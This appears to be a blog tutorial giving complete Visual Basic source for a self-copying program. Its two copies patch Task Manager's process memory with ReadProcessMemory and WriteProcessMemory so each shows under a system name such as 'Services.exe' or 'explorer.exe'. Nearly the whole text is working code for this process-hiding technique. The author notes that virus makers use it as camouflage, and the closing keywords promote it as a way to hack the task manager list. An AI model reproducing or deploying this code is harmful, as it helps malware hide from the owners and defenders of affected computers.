We will make a program, where the program is able to insert fake information the program name into the task manager. If we want to change the name of our program, then we have to take the data memory in the Task Manager program using ReadProcessMemory API function, then revamped and re-entry into the Task Manager by using the API function.
For more details we will create a program that can copy itself to be several
programs, where these programs will be mutually
changed their name in the Task
Manager.
For example, the program name is Ambarhalim.exe and
Porsea.exe.
- Ambarhalim.exe will change the Porsea.exe name to be
Services.exe.
- Porsea.exe will change the Ambarhalim.exe name to be
explorer.Exe.
This project created using Visual Basic. The steps are as follows:
1. Run the Visual Basic program on your PC.
2. Make 1 listbox (Listbox1) and 1 timer (Timer1) in the form1.
3. Set interval timer value to 500 (0.5 seconds).
In the Form1 code window, enter the source code below.
Private Sub Form_Load()Dim index1 As String
Dim Ambarhalim As String
Dim Porsea As String
index1 = App.Path & "\" & App.EXEName & ".exe"
Ambarhalim = App.Path & "\Ambarhalim.exe"
Porsea = App.Path & "\Porsea.exe"
If App.EXEName <> "Ambarhalim" And App.EXEName <> "Porsea" Then
FileCopy index1, Ambarhalim
FileCopy index1, Porsea
Shell Ambarhalim
Shell Porsea
End
End If
End Sub
In the Timer1 code window, enter the source code below.
Timer1.Enabled = False
If Second(Now) Mod 5 = 0 Then Update
If App.EXEName = "Ambarhalim" Then Disguise "Porsea.exe", "Services.exe"
If App.EXEName = "Porsea" Then Disguise "Ambarhalim.exe", "explorer.exe"
Timer1.Enabled = True
End Sub
For this project we also need the file module, add the module file! In the
Module1 code window, enter the source code below.
Const TH32CS_SNAPALL = (&H1 Or &H2 Or &H4 Or &H8)
Const TH32CS_SNAPPROCESS As Long = 2&
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 260
End Type
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private myHandle As Long
Private myproclist$
Public Function Update()
Dim hSnapShot As Long, uProcess As PROCESSENTRY32, r As Long
Form1.List1.Clear
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
uProcess.dwSize = Len(uProcess)
r = Process32First(hSnapShot, uProcess)
Do While r
Form1.List1.AddItem Left$(uProcess.szExeFile, IIf(InStr(1, uProcess.szExeFile, Chr$(0)) > 0, InStr(1, uProcess.szExeFile, Chr$(0)) - 1, 0))
Form1.List1.ItemData(Form1.List1.NewIndex) = uProcess.th32ProcessID
r = Process32Next(hSnapShot, uProcess)
Loop
CloseHandle hSnapShot
End Function
Private Function UNICODE(data As String) As String
Dim tmp As String
Dim i As Integer
tmp = ""
For i = 1 To Len(data)
tmp = tmp & Chr(0) & Mid(data, i, 1)
Next
UNICODE = tmp
End Function
Private Function InitProcHack(pid As Long) As Boolean
Dim pHandle As Long
pHandle = OpenProcess(&H1F0FFF, False, pid)
If (pHandle = 0) Then
InitProcHack = False
myHandle = 0
Else
InitProcHack = True
myHandle = pHandle
End If
End Function
Private Sub REPSTRINGINPROC(PIDX As Long, Origin As String, Recent As String)
Dim SRCHSTRING As String
Dim REPSTRING As String
Dim startpos As Integer
Dim p As String
Dim bytewrite As Long
If Not InitProcHack(PIDX) Then Exit Sub
Dim c As Integer
Dim addr As Long
Dim buffer As String * 30000
Dim readlen As Long
Dim writelen As Long
Corrective Origin, Recent
SRCHSTRING = UNICODE(Origin)
REPSTRING = UNICODE(Recent)
For addr = 0 To 4000
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)
If readlen > 0 Then
startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING, Len(REPSTRING), bytewrite)
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1
Wend
End If
Next addr
DoEvents
Close #1
DoEvents
End Sub
Private Function Corrective(scr As String, rep As String)
Dim i As Integer
For i = 0 To Form1.List1.ListCount - 1
If LCase(Form1.List1.List(i)) = LCase(scr) Then
scr = Form1.List1.List(i)
Exit For
End If
Next
For i = 0 To Form1.List1.ListCount - 1
If LCase(Form1.List1.List(i)) = LCase(rep) Then
rep = Form1.List1.List(i)
Exit For
End If
Next
If Len(scr) > Len(rep) Then
rep = rep + Left(" ", Len(scr) - Len(rep))
End If
If Len(rep) > Len(scr) Then
scr = scr + Left(" ", Len(rep) - Len(scr))
End If
End Function
Public Sub Disguise(Origin As String, Recent As String)
Dim newproclist$
Dim myProcess As PROCESSENTRY32
Dim mySnapshot As Long
newproclist$ = ""
myProcess.dwSize = Len(myProcess)
mySnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
Process32First mySnapshot, myProcess
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If
newproclist$ = "[" & myProcess.th32ProcessID & "]"
While Process32Next(mySnapshot, myProcess)
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If
newproclist$ = newproclist$ & "[" & myProcess.th32ProcessID & "]"
Wend
myproclist$ = newproclist$
End Sub
You are free to give a name to this program. This example source code is often used by virus maker as a camouflage so that the program hard to find.
Keyword: Modifiers task manager list | How to hack task manager list | How to crack task manager list Tumpal Tambunan
|
You may also like: